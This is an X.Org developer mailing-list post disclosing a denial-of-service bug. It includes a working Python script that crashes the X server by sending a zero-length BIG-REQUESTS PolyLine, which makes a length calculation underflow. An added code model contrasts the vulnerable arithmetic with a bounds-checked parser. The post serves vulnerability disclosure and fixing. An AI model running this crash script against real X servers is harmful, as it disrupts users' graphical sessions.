Here is a script that can be used to crash X server using a broken big request 
for PolyLine. It connects to DISPLAY=:1 and doesn't support authentication. 
Look inside the script for more details.

Other requests could be used to crash the X server in a similar way, for example 
SetFontPath.

Michal Srb

#!/usr/bin/env python

# This script crashes X server by sending a PolyLine request as a big request with incorrect length.
# The length underflows in X server, so it seems that the received request is huge.
# X server then tries to swap all elements inside the giant PolyLine request, eventually triggering segfault.

# Other requests could be used to crash the X server in a similar way, for example SetFontPath.

# Author: Michal Srb <m...@suse.com>
# License: MIT


# ---------- Configure this ----------

# Display to connect to
display_number = "1"
display_socket = "/tmp/.X11-unix/X" + display_number

# BIG-REQUESTS extension id
big_requests_extension = 133

# ------------------------------------


import struct
import socket

# Connection initiation
data = struct.pack(
  ">cxHHHHxx", # xConnClientPrefix
  'B',         # .byteOrder        = Big endian
  11,          # .majorVersion     = 11
  0,           # .minorVersion     = 0
  0,           # .nbytesAuthProto  = None # TODO: Support authentications
  0            # .nbytesAuthString = None # TODO: Support authentications
)

# Enable big requests
data += struct.pack(
  ">BBH",                 # xBigReqEnableReq
  big_requests_extension, # .reqType = XBigReqCode
  0,                      # .brReqType = X_BigReqEnable
  1                       # .length = 1 * 4B = 4B
)

# PolyLine as big request
data += struct.pack(
  ">BBHIII",   # xPolyLineReq
  65,          # .reqType      = Poly Line request
  0,           # .coordMode    = whatever
  0,           # .length       = 0 -> big request!
  0,           # .length (big request) = 0 ... XXX This will underflow!
  0,           # .drawable     = whatever
  0,           # .gc           = whatever
)

# Send it
s = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
s.connect(display_socket)
s.sendall(data)
s.recv(1)
s.close()
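The length underflow the script relies on, modelled in added example code (not the script's or the X server's own source): the same request header is parsed once with the vulnerable arithmetic and once with the minimum-size check the server applies through its REQUEST_AT_LEAST_SIZE macro. The opcode table, the BadLength class and the two sample requests are constructed for this example.

```python
import struct

# Fixed part of each request this example understands, in bytes
# (xPolyLineReq = reqType, coordMode, length, drawable, gc = 12 bytes).
# Constructed for this example; the real server knows one size per opcode.
FIXED_BYTES = {65: 12}  # X_PolyLine

class BadLength(ValueError):
    """The error the server should return instead of walking off the buffer."""

def parse_header(buf):
    """Return (opcode, declared_words, header_bytes) for one X request.

    declared_words counts the whole request in 4-byte units.  A 16-bit length
    of 0 means BIG-REQUESTS: a 32-bit length follows, the header is 8 bytes,
    and that extra word is included in the count.
    """
    if len(buf) < 4:
        raise BadLength("truncated header")
    opcode, _data, words = struct.unpack(">BBH", buf[:4])
    if words != 0:
        return opcode, words, 4
    if len(buf) < 8:
        raise BadLength("truncated big-request header")
    return opcode, struct.unpack(">I", buf[4:8])[0], 8

def rest_words_unchecked(buf):
    """Vulnerable arithmetic: subtract the fixed size before checking that the
    declared length can hold it.  The 32-bit mask models the unsigned underflow:
    a declared length of 0 becomes ~4 billion words of 'points' to swap."""
    opcode, words, hdr = parse_header(buf)
    return (words - (FIXED_BYTES[opcode] + hdr - 4) // 4) & 0xFFFFFFFF

def rest_words_checked(buf):
    """Hardened form: a REQUEST_AT_LEAST_SIZE-style check before subtracting."""
    opcode, words, hdr = parse_header(buf)
    need = (FIXED_BYTES[opcode] + hdr - 4) // 4
    if words < need:
        raise BadLength("declared %d words, need at least %d" % (words, need))
    return words - need

# Constructed inputs: the zero-length big PolyLine the script sends, and a
# well-formed big PolyLine carrying two points (8 bytes = 2 words of payload).
BROKEN_POLYLINE = struct.pack(">BBHIII", 65, 0, 0, 0, 0, 0)
GOOD_POLYLINE = (struct.pack(">BBHIII", 65, 0, 0, 6, 0, 0)
                 + struct.pack(">4h", 1, 2, 3, 4))
```

For the script's request, rest_words_unchecked returns 4294967292 while rest_words_checked raises BadLength; the well-formed request yields 2 payload words either way.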
_______________________________________________
xorg-devel@lists.x.org: X.Org development
Archives: http://lists.x.org/archives/xorg-devel
Info: https://lists.x.org/mailman/listinfo/xorg-devel